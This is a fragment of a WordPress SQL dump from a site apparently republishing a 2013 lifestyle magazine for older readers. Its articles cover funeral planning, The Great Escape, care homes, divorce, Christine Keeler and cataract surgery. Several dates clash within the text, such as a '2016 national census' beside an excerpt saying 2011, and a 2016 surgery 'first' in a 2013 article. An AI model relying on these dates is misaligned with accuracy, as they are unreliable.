of The Great Escape, funeral plans, care plans and travel ideas.</p>&#13;\n<p><a href=\"http://www.ewartshaw.co.uk/financepublications/2013/GUAG.pdf\">Download PDF</a></p>&#13;\n<p></p><div><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=131025144054-f6d9bf7d073c736926edd44d453175b2&amp;docName=guag&amp;username=Lyonsdown&amp;loadingInfoText=Guag&amp;showFlipBtn=true&amp;backgroundColor=FFFFFF&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=131025144054-f6d9bf7d073c736926edd44d453175b2&amp;docName=guag&amp;username=Lyonsdown&amp;loadingInfoText=Guag&amp;showFlipBtn=true&amp;backgroundColor=FFFFFF&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object><div style=\"width:610px;text-align:left;\"><a href=\"http://issuu.com/Lyonsdown/docs/guag?mode=embed&amp;backgroundColor=FFFFFF&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" target=\"_blank\">Open publication</a> - Free <a href=\"http://issuu.com/\" target=\"_blank\">publishing</a></div></div>&#13;\n<p> </p>&#13;\n									</div>','Get up and go – October 2013','In our October edition of Get Up and Go, we profile Christine Keeler, Raymond Blanc, Bernard Gallacher and Selina Scott. We also look at a TV remake of The','publish','open','open','','get-up-and-go-october-2013','','','2018-04-02 20:03:26','2018-04-02 20:03:26','',0,'http://westonspirit.org.uk/get-up-and-go-october-2013.asp',0,'post','',0),(286,1,'2017-01-06 19:40:40','2017-01-06 19:40:40','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">30 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"How to get the funeral you want\" st_url=\"http://westonspirit.org.uk/2013/10/how-to-get-the-funeral-you-want/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"How to get the funeral you want\" st_url=\"http://westonspirit.org.uk/2013/10/how-to-get-the-funeral-you-want/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"How to get the funeral you want\" st_url=\"http://westonspirit.org.uk/2013/10/how-to-get-the-funeral-you-want/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"How to get the funeral you want\" st_url=\"http://westonspirit.org.uk/2013/10/how-to-get-the-funeral-you-want/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"How to get the funeral you want\" st_url=\"http://westonspirit.org.uk/2013/10/how-to-get-the-funeral-you-want/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><strong>When Fiona Hendry’s husband Raymond died, aged 61, of stomach cancer, one of her regrets was that they had not properly discussed arrangements for his funeral.<span id=\"more-3399\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3400 alignnone\" title=\"Funeral\" src=\"/wp-content/uploads/2013/10/Funeral.jpg\" alt=\"\" width=\"596\" height=\"397\" srcset=\"../../../wp-content/uploads/2013/10/Funeral.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></p>&#13;\n<p>She even emailed Radio 4’s Women’s Hour suggesting that they devote some of their programme to the subject. They agreed and so it was, earlier this summer, that Fiona went on to talk to presenter Jenni Murray.</p>&#13;\n<p>“I had an idea of what Raymond might have wanted (for his funeral) because we had been together for <br /> 33 years,” said Fiona. “We had small snatches of conversation but it was too, too difficult. Our days were filled in trying to look after him – getting him to eat, to drink. It was just too distressing to discuss [funeral arrangements].”</p>&#13;\n<p>Since her husband’s death, Fiona has put forward the idea of Funeral Fairs, where people could find out more information about death. “It would be a good environment for people to come and talk about different sorts of burial, cremation, flowers, services, poetry, prose, memorial benches, anything like that,” said Fiona. “It would give them an idea of what they might like to create for their own death when the time came.”</p>&#13;\n<p><img class=\"alignright  wp-image-3401\" title=\"Costa Book Of The Year Awards\" src=\"/wp-content/uploads/2013/10/Funeral2.jpg\" alt=\"\" width=\"251\" height=\"382\" srcset=\"../../../wp-content/uploads/2013/10/Funeral2.jpg 596w\" sizes=\"(max-width: 251px) 100vw251px\" />Dominic Maguire, from the National Association of Funeral Directors, agreed. “Death is a subject that is a taboo for many people,” he said. “Regrettably, there are many families making funeral arrangements for people they have loved and lost and they are guessing what that person might have wished for. We would encourage people to lay down, in general terms what they would like before the time comes when it’s required.</p>&#13;\n<p>“I have seen it so many times that someone arranges a funeral, they guess what the deceased would have wanted and they discover afterwards, perhaps when the will is read, that, rather than be cremated, the deceased wanted to be buried. It has left them emotionally distressed.”</p>&#13;\n<p>One recent development which is proving increasingly popular is the so-called Death Café. Sue Barsky Reid, a qualified and experienced psychotherapist and counsellor from Chester, is a strong supporter. “At Death Cafés people drink tea, eat cake and discuss death,” she explains simply. “Our aim is to increase awareness of death to help people make the most of their (finite) lives. To date we’ve had over 200 Death Cafés in nine countries. These have been consistently wonderful events with far more laughter than tears.”</p>&#13;\n									</div>','How to get the funeral you want','When Fiona Hendry’s husband Raymond died, aged 61, of stomach cancer, one of her regrets was that they had not properly discussed arrangements for his funeral','publish','open','open','','how-to-get-the-funeral-you-want','','','2018-04-02 20:03:25','2018-04-02 20:03:25','',0,'http://westonspirit.org.uk/how-to-get-the-funeral-you-want.asp',0,'post','',0),(287,1,'2016-12-05 01:01:57','2016-12-05 01:01:57','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">30 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"King of Cool 2: The Great Escape\" st_url=\"http://westonspirit.org.uk/2013/10/king-of-cool-2-the-great-escape/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"King of Cool 2: The Great Escape\" st_url=\"http://westonspirit.org.uk/2013/10/king-of-cool-2-the-great-escape/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"King of Cool 2: The Great Escape\" st_url=\"http://westonspirit.org.uk/2013/10/king-of-cool-2-the-great-escape/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"King of Cool 2: The Great Escape\" st_url=\"http://westonspirit.org.uk/2013/10/king-of-cool-2-the-great-escape/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"King of Cool 2: The Great Escape\" st_url=\"http://westonspirit.org.uk/2013/10/king-of-cool-2-the-great-escape/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<div>&#13;\n<p><strong>But can a TV remake of The Great Escape do justice to McQueen and co?<span id=\"more-3404\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3405 alignnone\" title=\"\'The Great Escape\' Film - 1963\" src=\"/wp-content/uploads/2013/10/King-of-Cool3.jpg\" alt=\"\" width=\"596\" height=\"478\" srcset=\"../../../wp-content/uploads/2013/10/King-of-Cool3.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></p>&#13;\n</div>&#13;\n<div>This year marks the 50th anniversary of one of the most celebrated prisoner-of-war films in history, <em>The Great Escape</em>. The 1963 classic, starring Steve McQueen, is best known for the iconic scene in which he attempts to ride his motorbike over a barbed-wire fence while being chased by Germans, and remains a Christmas television stalwart.</div>&#13;\n<p>With apt timing, the BBC is now in the early stages of developing a remake of the wartime adventure. The remake, which is set to be a mini-series, is being developed by GK-TV in conjunction with Open Circle, a small American firm founded by ex-Lionsgate executive Craig Cegielski.</p>&#13;\n<p><img class=\" wp-image-3406 alignleft\" title=\"THE GREAT ESCAPE, top: Steve McQueen, bottom from left: Richard Attenborough, Steve McQueen, James Garner on poster art, 1963.\" src=\"/wp-content/uploads/2013/10/King-of-Cool2.jpg\" alt=\"\" width=\"286\" height=\"386\" srcset=\"../../../wp-content/uploads/2013/10/King-of-Cool2.jpg 596w\" sizes=\"(max-width: 286px) 100vw286px\" />Although no casting information or release date has yet been announced, Alex Schondorf, a movie-marketing executive with a long experience in the Hollywood film industry, is a fan of the project.</p>&#13;\n<p>He said: “I could see Brad Pitt, Jeremy Renner or Russell Crowe playing Steve McQueen’s role of Virgil Hilts. Maybe even Daniel Craig would make my top choice. Either way, those are tough shoes to fill.</p>&#13;\n<p>“<em>The Great Escape</em> set the mark as one of the first well-executed action films. You can’t look at a heist film and <br /> not think of this movie. It’s absolutely relevant to audiences today, who thirst for strong filmmaking with a great narrative. And the all-star cast led by Steve McQueen doesn’t hurt. It’s the type of film that sucks you in, making it easy to watch over and over again.”</p>&#13;\n<p>It is not only the movie professions who understand the timelessness of the film. Darren Wright, who runs a fan website dedicated to Steve McQueen, says: “It was just one of those magic films where all the elements fall together perfectly.  A perfect ensemble cast, down to the smallest roles, a perfect director in John Sturges who knew how to bring the best out of his actors – particularly McQueen, a wonderful and inspirational music score and, of course, a fantastic story of ingenuity and courage in the face of terrible dangers. Plus the motorbike scene!”</p>&#13;\n<p><img class=\"alignright  wp-image-3407\" title=\"THE GREAT ESCAPE, Steve McQueen, 1963\" src=\"/wp-content/uploads/2013/10/King-of-Cool.jpg\" alt=\"\" width=\"358\" height=\"393\" srcset=\"../../../wp-content/uploads/2013/10/King-of-Cool.jpg 596w\" sizes=\"(max-width: 358px) 100vw358px\" />Wright, though, is concerned any remake would not live up to the original. “There are some great actors out there who could do the role justice, but I don’t think they will have that McQueen magic,” he said. “McQueen was one of a kind. I suggest anyone who takes his part should try to make the role their own, bring their own unique charisma, but don’t try to emulate the king of cool. It won’t work.”</p>&#13;\n<p>The film, based on a non-fiction book written by the Australian PoW veteran Paul Brickhill, <em>The Great Escape</em> tells the tale of how 76 men escaped the Luftwaffe-run Stalag Luft III prison camp in German-occupied Poland via a 330ft tunnel, 30ft below ground. Although the escapees miscalculated the length of the tunnel, which resulted in the recapture of 73 of them, 50 of whom were subsequently shot by the Gestapo, the story lives on as one of the most courageous escape attempts of World War II.</p>&#13;\n<p>Although the film was originally to be shot in California, Sturges couldn’t find anywhere in America he thought adequately resembled a Bavarian forest. In the end, he settled on filming in Fussen in Bavaria, five kilometres north of the Austrian border. In honour of the half-century anniversary, an exhibition celebrating the filming of <em>The Great Escape</em> is being held in the Fussen Town Hall, from October to January 2014.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p><strong>Nina Reschovsky</strong></p>&#13;\n									</div>','King of Cool 2: The Great Escape','But can a TV remake of The Great Escape do justice to McQueen and co? This year marks the 50th anniversary of one of the most celebrated prisoner-of-war','publish','open','open','','king-of-cool-2-the-great-escape','','','2018-04-02 20:03:23','2018-04-02 20:03:23','',0,'http://westonspirit.org.uk/king-of-cool-2-the-great-escape.asp',0,'post','',0),(288,1,'2017-03-22 09:41:50','2017-03-22 09:41:50','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">27 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"MHA – helping you get more from later life\" st_url=\"http://westonspirit.org.uk/2013/10/mha-helping-you-get-more-from-later-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"MHA – helping you get more from later life\" st_url=\"http://westonspirit.org.uk/2013/10/mha-helping-you-get-more-from-later-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"MHA – helping you get more from later life\" st_url=\"http://westonspirit.org.uk/2013/10/mha-helping-you-get-more-from-later-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"MHA – helping you get more from later life\" st_url=\"http://westonspirit.org.uk/2013/10/mha-helping-you-get-more-from-later-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"MHA – helping you get more from later life\" st_url=\"http://westonspirit.org.uk/2013/10/mha-helping-you-get-more-from-later-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<p><strong>Award-winning care providers focus on choice and fulfilment<span id=\"more-3382\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3383 alignnone\" title=\"MHA\" src=\"http://westonspirit.org.uk/wp-content/uploads/2013/10/MHA.jpg\" alt=\"\" width=\"596\" height=\"417\" /></p>&#13;\n<p>Imagine being able to see into the future – to know what’s in store for you and your family in the years ahead. None of us can do this, but we can all make plans that will help preserve our independence and ensure that even if we need considerable care and support, we can still enjoy quality of life in our later years.</p>&#13;\n<p>MHA is one of Britain’s biggest charities and a leading provider of housing, care and support for older people. Formed 70 years ago, today we provide services to more than 16,000 older people in nearly 200 locations across the UK. </p>&#13;\n<p>Our services promote quality of life and wellbeing for a wide range of older people from all walks of life – those living at home, in our state-of-the-art retirement living developments, or in our award-winning care homes. Our approach focuses on the whole person – body, mind and spirit – and treats everyone as an individual.</p>&#13;\n<p><strong>Live at home</strong></p>&#13;\n<p>For more than 25 years we’ve been helping older people get more out of life while living independently in their own homes. Our national network of local groups, run in partnership with local people, provides advice, support and friendship to more than 9,000 older people across the UK.</p>&#13;\n<p><strong>Retirement living</strong></p>&#13;\n<p>We provide a wide range of retirement developments, many featuring apartments that offer all the privacy and independence of your own home (for purchase, part-purchase and rent), along with communal facilities and 24-hour on-site staff teams to deliver domestic help as well as personal care and support.</p>&#13;\n<p><strong>Care Homes</strong></p>&#13;\n<p>Our award-winning care homes for residential, nursing and dementia care provide care focused on respecting residents as unique individuals who deserve fulfilment and opportunities to express themselves every day.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<div>&#13;\n<p><em>For more information on how we could help you or a loved one visit <a href=\"http://www.mha.or.uk/\" target=\"_blank\">www.mha.or.uk</a> or call 01332 296200</em></p>&#13;\n</div>&#13;\n									</div>','MHA – helping you get more from later life','Award-winning care providers focus on choice and fulfilment Imagine being able to see into the future – to know what’s in store for you and your family','publish','open','open','','mha-helping-you-get-more-from-later-life','','','2018-04-02 20:03:22','2018-04-02 20:03:22','',0,'http://westonspirit.org.uk/mha-helping-you-get-more-from-later-life.asp',0,'post','',0),(289,1,'2016-08-08 03:32:47','2016-08-08 03:32:47','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">31 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Monica Porter: Why unstinting love is the real key to a happy family life\" st_url=\"http://westonspirit.org.uk/2013/10/monica-porter-why-unstinting-love-is-the-real-key-to-a-happy-family-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Monica Porter: Why unstinting love is the real key to a happy family life\" st_url=\"http://westonspirit.org.uk/2013/10/monica-porter-why-unstinting-love-is-the-real-key-to-a-happy-family-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Monica Porter: Why unstinting love is the real key to a happy family life\" st_url=\"http://westonspirit.org.uk/2013/10/monica-porter-why-unstinting-love-is-the-real-key-to-a-happy-family-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Monica Porter: Why unstinting love is the real key to a happy family life\" st_url=\"http://westonspirit.org.uk/2013/10/monica-porter-why-unstinting-love-is-the-real-key-to-a-happy-family-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Monica Porter: Why unstinting love is the real key to a happy family life\" st_url=\"http://westonspirit.org.uk/2013/10/monica-porter-why-unstinting-love-is-the-real-key-to-a-happy-family-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><strong>It was recently revealed that Dorset is the county with the highest proportion of married couples. Based on figures from the 2016 national census, it appears that, for some reason, fewer people get divorced there.<span id=\"more-3414\"></span></strong></p>&#13;\n<p><img class=\"alignright  wp-image-3415\" title=\"Monica Porte\" src=\"/wp-content/uploads/2013/10/Monica-Porte.jpg\" alt=\"\" width=\"251\" height=\"313\" srcset=\"../../../wp-content/uploads/2013/10/Monica-Porte.jpg 596w\" sizes=\"(max-width: 251px) 100vw, 251px\" />This news delighted me because my married son Adam and his wife live in Dorset and it’s great to think that their choice of location boosts their chances of a successful and enduring marriage. Which is something I didn’t manage to have with Adam’s father; we divorced many years ago.</p>&#13;\n<p>The biggest social shift in the past quarter-century has been the emergence of divorce almost as a norm. Yet I remember when there was still a stigma attached to it. When my younger son Nick was at prep school there were only two other boys in his class from “broken homes”. Through some strange, nameless process the three boys were drawn to each other and formed a separate little grouping, a sort of “outsiders’ club” – subconsciously, of course.</p>&#13;\n<p>Fast forward a couple of decades. Nick is in his mid-twenties and telling me about his new girlfriend, explaining that her mum lives in one town and her dad in another. “So her parents are divorced?” I ask. “Yup,” he replies. “Aren’t everybody’s?” From outsider to everyman in one generation. That’s change, all right.</p>&#13;\n<p>There’s been another change too, for me personally. In the light of my current circumstances of having a married son, <br /> I’ve been revising my whole perspective on divorce. Whilst going through it myself, I never considered the collateral emotional damage to the older generation: my parents and parents-in-law. But now, knowing how devastated I’d be if Adam’s marriage hit the rocks, I can appreciate how they must have felt.</p>&#13;\n<p>Not least of it is concern for the welfare of the children involved. The divorcing person is consumed by what this major step means to his or her life, not fully aware of the impact it will have on the kids. I know better now. And I wouldn’t wish it on my two adorable little grandsons.</p>&#13;\n<p>Do I regret getting divorced? Nope. I still believe it was the right thing to do. And who would wish back the bad old days when so many were trapped in miserable marriages because of the difficulties of leaving them?</p>&#13;\n<p>What’s more, the resilience of the human spirit is a wonderful thing. My sons weathered the divorce storm. Today they are contented, well adjusted, thriving. In a family, “broken” or otherwise, unstinting love goes a long way. That is the sine qua non.</p>&#13;\n<p>A few years ago, a survey found that Bournemouth was the happiest place in the UK, with 82 per cent of people questioned saying they were happy with their lives. This too was excellent news because…yup, you guessed it. It’s in Bournemouth that Adam and his family reside. I’m beginning to love surveys and statistics.</p>&#13;\n<p>Now I just have to figure out what it is about Bournemouth that makes people happy. I mean, the Côte d’Azur it ain’t. As I am reminded every time I take a dip. Brrr…</p>&#13;\n									</div>','Monica Porter: Why unstinting love is the real key to a happy family life','It was recently revealed that Dorset is the county with the highest proportion of married couples. Based on figures from the 2011 national census, it appears','publish','open','open','','monica-porter-why-unstinting-love-is-the-real-key-to-a-happy-family-life','','','2018-04-02 20:03:20','2018-04-02 20:03:20','',0,'http://westonspirit.org.uk/monica-porter-why-unstinting-love-is-the-real-key-to-a-happy-family-life.asp',0,'post','',0),(290,1,'2017-03-04 17:13:05','2017-03-04 17:13:05','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"My afternoon at The Savoy taking tea with Christine Keeler\" st_url=\"http://westonspirit.org.uk/2013/10/my-afternoon-at-the-savoy-taking-tea-with-christine-keeler/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"My afternoon at The Savoy taking tea with Christine Keeler\" st_url=\"http://westonspirit.org.uk/2013/10/my-afternoon-at-the-savoy-taking-tea-with-christine-keeler/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"My afternoon at The Savoy taking tea with Christine Keeler\" st_url=\"http://westonspirit.org.uk/2013/10/my-afternoon-at-the-savoy-taking-tea-with-christine-keeler/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"My afternoon at The Savoy taking tea with Christine Keeler\" st_url=\"http://westonspirit.org.uk/2013/10/my-afternoon-at-the-savoy-taking-tea-with-christine-keeler/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"My afternoon at The Savoy taking tea with Christine Keeler\" st_url=\"http://westonspirit.org.uk/2013/10/my-afternoon-at-the-savoy-taking-tea-with-christine-keeler/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<p><strong>I’ve never forgotten my afternoon with Christine Keeler. It cost my then-employers at the <em>Daily Mail</em> £5,000 to arrange a newspaper stunt publicising <em>Scandal</em>, a breezy 1989 film about the Profumo affair in which Keeler was the </strong><strong>colt-legged catalyst.<span id=\"more-3391\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3392 alignnone\" title=\"Christine Keeler Former Model And Prostitute Who Was Involved In The John Profumo Affair Is Pictured Drinking Tea At The Savoy With Actress Joanne Whalley Who Will Play Her In The Film \'scandal\'.\" src=\"/wp-content/uploads/2013/10/Christine-Keeler.jpg\" alt=\"\" width=\"596\" height=\"446\" srcset=\"../../../wp-content/uploads/2013/10/Christine-Keeler.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></p>&#13;\n<p>She was played by Joanne Whalley and there were posters all over Britain at the time of the actress recreating the celebrated, black-and-white photo of a naked Keeler, legs wrapped around that Heal’s tubular steel chair.</p>&#13;\n<p>I took a riverside suite at The Savoy and the two women arrived for a photo session, to chat about the film, Profumo – and sex, of course – all over afternoon tea. I didn’t know what to expect of the nation’s foremost scarlet woman, but the Keeler who walked through the door wasn’t anything like the Keeler of my imagination.</p>&#13;\n<p><img class=\"alignright  wp-image-3393\" title=\"VARIOUS - 1964\" src=\"/wp-content/uploads/2013/10/Christine-Keeler2.jpg\" alt=\"\" width=\"286\" height=\"390\" srcset=\"../../../wp-content/uploads/2013/10/Christine-Keeler2.jpg 596w\" sizes=\"(max-width: 286px) 100vw286px\" />She wore an elegant dress, black gloves and light make-up, spoke quietly and seriously, and observed Sunday school manners. Only her snaggletoothed grin from behind scarlet pillow lips hinted at the sexual hinterland that once made her irresistible. She behaved with an almost regal poise.</p>&#13;\n<p>Joanne Whalley wore clothes that looked as if they had come from Oxfam, had dirty fingernails, interrupted rudely and generally was a pain in the behind. She lived up to her name by having nothing interesting to say about the character she played. Keeler was the real lady at The Savoy and told me with complete candour: “I never liked sex. With men there was always an understanding that at some point I would take my clothes off.</p>&#13;\n<p>I liked proper relationships but there weren’t many of those. Lovemaking with Profumo was unmemorable. It was all over so quickly. Stephen Ward? He never procured men for me. He was innocent. But the police frightened me into saying things.” All great copy for a mid-market newspaper.</p>&#13;\n<p>Now Andrew Lloyd Webber has written a musical – entitled <em>Stephen Ward</em> – about the Profumo affair, which premieres in the West End in December and has cast little-known former child-actress Charlotte Spencer as Keeler, who I trust will bring more conviction to the role than Whalley.</p>&#13;\n<p>Lloyd Webber is focusing on Stephen Ward, the society osteopath who committed suicide before he could be convicted at the Old Bailey of living off immoral earnings. It was Ward, of course, who introduced Keeler to Profumo at Lord Astor’s Cliveden estate after the Tory war minister famously became dazzled by the sight of her swimming sans costume. It’s now accepted he was set up by an Establishment desperate for a scapegoat to hang.</p>&#13;\n<p><img class=\" wp-image-3395 alignleft\" title=\"\'Stephen Ward\' Musical Photocall, London, Britain - 30 Sep 2013\" src=\"/wp-content/uploads/2013/10/Christine-Keeler4.jpg\" alt=\"\" width=\"358\" height=\"505\" srcset=\"../../../wp-content/uploads/2013/10/Christine-Keeler4.jpg 596w\" sizes=\"(max-width: 358px) 100vw358px\" />Don Black is the lyricist. He is a wonderful writer and has an Oscar on his mantelpiece for <em>Born Free</em>. But I have a nagging feeling Lloyd Webber’s old collaborator Tim Rice would be a better fit. Tim is more journalistic, best illustrated by <em>Evita</em>, and would, I am sure, have created an illuminating text on this dark passage in Britain’s post war history.</p>&#13;\n<p>Lloyd Webber provided his famous friends with a 45-minute preview of <em>Stephen Ward</em> recently at his Watership Down mansion. The composer has one of the finest art collections in private hands but guests entering the hall were greeted by a sketch of a beautiful Bardot-era French actress they didn’t recognise, drawn by an unknown hand.</p>&#13;\n<p>The artist was, in fact, Stephen Ward himself, in great demand in the late Fifties by fashionable society. Lloyd Webber is so obsessed by Ward he hunted down the only drawing by him he could buy, and there is no doubt the exposure of the Profumo story to new generations will rescue Ward’s reputation in this, the 50th anniversary of the scandal.</p>&#13;\n<p>Of the major Profumo players only Keeler and her fellow topless showgirl Mandy Rice-Davies are still alive. Keeler has spent half a century bitching about Mandy, perhaps because she lives in straightened circumstances while Mandy, who married wealth, enjoys the lush life. Mandy was the star guest at Lloyd Webber’s party.</p>&#13;\n<p>Today, Christine is unrecognisable from the siren in those old news photographs that dominated front pages even in the year of Kennedy’s assassination, the Great Train Robbery, and the first James Bond film.</p>&#13;\n<p>Mandy, at 68, conversely still has the foxy personality that captivated the nation. She told me: “Christine and me are forever twinned in the public’s mind, like Cross and Blackwell, but most of my life has been a slow descent into respectability.”</p>&#13;\n<p>I was once invited to her London home. She offered me a drink. When she opened the fridge I noticed there was no food; only bottles of champagne. Mandy loved to party.</p>&#13;\n<p>Lloyd Webber is hoping to bring Mandy and Christine together for the first time in half a century. That may be a bigger event than the show itself.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p><strong>Roderick Gilchrist</strong></p>&#13;\n									</div>','My afternoon at The Savoy taking tea with Christine Keeler','I’ve never forgotten my afternoon with Christine Keeler. It cost my then-employers at the Daily Mail £5,000 to arrange a newspaper stunt publicising Scandal, a','publish','open','open','','my-afternoon-at-the-savoy-taking-tea-with-christine-keeler','','','2018-04-02 20:03:17','2018-04-02 20:03:17','',0,'http://westonspirit.org.uk/my-afternoon-at-the-savoy-taking-tea-with-christine-keeler.asp',0,'post','',0),(291,1,'2014-09-19 14:58:19','2014-09-19 14:58:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">27 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Pioneering surgery offering the gift of sight\" st_url=\"http://westonspirit.org.uk/2013/10/pioneering-surgery-offering-the-gift-of-sight/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Pioneering surgery offering the gift of sight\" st_url=\"http://westonspirit.org.uk/2013/10/pioneering-surgery-offering-the-gift-of-sight/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Pioneering surgery offering the gift of sight\" st_url=\"http://westonspirit.org.uk/2013/10/pioneering-surgery-offering-the-gift-of-sight/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Pioneering surgery offering the gift of sight\" st_url=\"http://westonspirit.org.uk/2013/10/pioneering-surgery-offering-the-gift-of-sight/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Pioneering surgery offering the gift of sight\" st_url=\"http://westonspirit.org.uk/2013/10/pioneering-surgery-offering-the-gift-of-sight/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<p><strong>A safer, more effective alternative to cataract removal<span id=\"more-3377\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3378 alignnone\" title=\"LEH\" src=\"http://westonspirit.org.uk/wp-content/uploads/2013/10/LEH.jpg\" alt=\"\" width=\"596\" height=\"447\" /></p>&#13;\n<div>Millions of British people can look forward to a lifetime of better sight thanks to a revolutionary treatment that has just been launched in the UK, which offers safer, more accurate and less invasive treatment for cataracts.</div>&#13;\n<p>For many years, cataracts have been seen as an unavoidable side-effect of ageing. Current techniques for cataract removal, which centre on high-frequency ultrasound to achieve “phacoemulsification”, nevertheless require a 3mm incision with a blade, before the cataract is broken up.</p>&#13;\n<p>Where the London Eye Hospital differs from this treatment is in the microscopic detail of the procedure. Using a Femtosecond cataract laser, surgeons create a 3D model of the eye at close to micron levels of accuracy.</p>&#13;\n<p>Bobby Qureshi became the first surgeon in the UK to use this approach in August 2016 and is the most experienced laser cataract surgeon in the UK. London Eye Hospital and Mr Qureshi combine the Femtosecond laser technology with the latest in premium lens implants to give patients freedom from their glasses and contact lenses.</p>&#13;\n<p><strong>The Patient View</strong></p>&#13;\n<p><img class=\"alignright  wp-image-3379\" title=\"LEH2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2013/10/LEH2.jpg\" alt=\"\" width=\"358\" height=\"355\" />Patricia Paul was 33 when she decided she needed to buy reading glasses. A few years later she needed glasses for driving. As she approached her 60th birthday she began to realise that her regular day-to-day vision had also deteriorated, so she decided to have laser eye surgery to correct her eyesight.  </p>&#13;\n<p>The initial results were impressive, but seven years after the surgery, Patricia noticed that her vision was again deteriorating. This is not uncommon after traditional laser eye surgery since, as we age, the natural lens inside the eye changes, a condition called presbyopia. This affects almost everybody over the age of 40 and reduces the eye’s ability to focus sharply on nearby objects, so reading glasses are required. Specialist lens implants can treat presbyopia but the surgeon told Patricia that she also had cataracts. This is a clouding of the natural lens in the eye and affects most people from their mid-50s, causing  blurred vision which cannot be corrected by glasses. Colours also lose their brilliance and whites are dimmer.</p>&#13;\n<p>Fortunately, Patricia had recently read about Light Adjustable Lens (LAL) implant surgery, the most technologically advanced implant now available, with the capacity to be altered after surgery to give the best vision possible without the need for glasses. The LAL, developed in the US by a team of Nobel Prize-winning scientists, is a revolutionary new type of lens that can give a patient “HD vision” after it has been inserted into the 